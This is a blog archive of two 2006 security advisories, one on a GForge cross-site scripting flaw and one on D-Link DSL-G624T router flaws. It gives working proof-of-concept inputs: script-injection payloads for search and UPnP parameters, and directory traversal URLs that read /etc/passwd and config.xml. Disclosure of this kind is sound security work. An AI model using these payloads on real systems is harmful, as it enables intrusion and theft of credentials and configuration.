2006 Octubre

Archivo de Octubre de 2006

GForge Cross Site Scripting vulnerability

26 de Octubre de 2006 |

Autor: admin

Version:	Tested on GForge 4.5.11
Discovered by:	José Ramón Palanco: jose.palanco(at)eazel(dot)es http://www.eazel.es
Description:	GForge is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting. To exploit any attacker may send via GET method the “words” variable to: >”<script>alert(‘www.eazel.es’)</script> to http://site/search/advanced_search.php?group_id=X&search=1 where X is any active project in the gforge installation. Timeline: discovered: 26/10/2006 published: 5/01/2007 keywords: advisory006-gforge-cross-site-scripting-vulnerability.html

Version:

Tested on GForge 4.5.11

Discovered by:

José Ramón Palanco: jose.palanco(at)eazel(dot)es

http://www.eazel.es

Description:

GForge is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting.

To exploit any attacker may send via GET method the “words” variable to:
>”<script>alert(‘www.eazel.es’)</script>
to http://site/search/advanced_search.php?group_id=X&search=1
where X is any active project in the gforge installation.
Timeline:
discovered: 26/10/2006
published: 5/01/2007

keywords: advisory006-gforge-cross-site-scripting-vulnerability.html

Publicado en Security Advisories |

Etiquetas: gforge, xss |

No hay comentarios »

D-Link DSL-G624T several vulnerabilities

20 de Octubre de 2006 |

Autor: admin

Version:	Tested on D-Link DSL-G624T Version: Firmware Version : V3.00B01T01.YA-C.20060616
Discovered by:	José Ramón Palanco: jose.palanco(at)eazel(dot).es http://www.eazel.es
Description:	D-Link DSL-G624T ADSL Router is vulnerable to several securities. Directory transversal http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml Cross Site Scripting Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fstate Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt> Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt> Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: “+onmouseover=”alert(20102006) Directory listing Is possible to list the /cgi-bin directory keywords: advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html

Version:

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616

Discovered by:

José Ramón Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es

Description:

D-Link DSL-G624T ADSL Router is vulnerable to several securities.

Directory transversal

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt>

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt>

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: “+onmouseover=”alert(20102006)

Directory listing

Is possible to list the /cgi-bin directory

keywords: advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html

Publicado en Security Advisories |

Etiquetas: d-link, directory transversal, xss |

1 comentario »